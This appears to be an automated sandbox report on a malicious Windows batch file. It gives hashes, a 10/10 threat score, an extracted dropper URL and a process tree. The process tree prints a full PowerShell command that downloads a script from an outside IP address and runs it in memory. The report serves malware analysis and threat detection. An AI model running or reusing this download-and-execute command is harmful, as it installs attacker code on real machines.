Analysis

  • max time kernel
    64s
  • max time network
    67s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    17-05-2020 02:10

General

  • Target

    1f8c25780845b838f9e4e236cecde44a.bat

  • Size

    220B

  • MD5

    aec4b8da44e26c2a159705665e2fd49d

  • SHA1

    24ebd61f5b8568a107ee16f17ae0bc3b07887b00

  • SHA256

    79aa8d7a7be4115acea3af97412982e19a243d37031ca75779e0d00d68127701

  • SHA512

    102759db61f6c214329230c3730e732d62bf5e114d2f712166bb6a811d93d1e7364bd68b3af95a2ab3dc48d225c28910278d2479a601aa676f6875670f634094

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/1f8c25780845b838f9e4e236cecde44a

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1f8c25780845b838f9e4e236cecde44a.bat"
    1⤵
      PID:2536
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1f8c25780845b838f9e4e236cecde44a');Invoke-PBOOTODBDYZFW;Start-Sleep -s 10000"
        2⤵
          PID:584
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:400

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/400-0-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

        Filesize

        4KB

      • memory/400-1-0x0000000005250000-0x0000000005251000-memory.dmp

        Filesize

        4KB